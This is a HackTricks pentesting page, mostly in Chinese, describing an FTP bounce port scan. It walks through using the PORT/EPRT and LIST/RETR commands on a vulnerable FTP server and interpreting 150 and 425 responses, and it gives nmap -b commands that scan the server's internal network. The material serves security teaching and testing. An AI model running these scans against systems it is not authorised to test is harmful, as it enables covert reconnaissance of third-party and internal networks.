FTP Bounce attack - Scan

Reading time: 3 minutes

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks

FTP Bounce - Scanning

Manual

  1. 连接到易受攻击的FTP
  2. 使用 PORTEPRT(但只能使用其中一个)来与您想要扫描的 <IP:Port> 建立连接:

PORT 172,32,80,80,0,8080
EPRT |2|172.32.80.80|8080|

  1. 使用 LIST(这将仅向连接的 <IP:Port> 发送FTP文件夹中当前文件的列表)并检查可能的响应:150 File status okay(这意味着端口是开放的)或 425 No connection established(这意味着端口是关闭的)
  2. 除了 LIST,您还可以使用 RETR /file/in/ftp 并查找类似的 Open/Close 响应。

使用 PORT 的示例(172.32.80.80 的端口 8080 是开放的,端口 7777 是关闭的):

使用 EPRT 的相同示例(图中省略了身份验证):

使用 EPRT 而不是 LIST 打开的端口(不同环境)

nmap

bash
nmap -b <name>:<pass>@<ftp_server> <victim>
nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP
nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443

tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE)

支持 HackTricks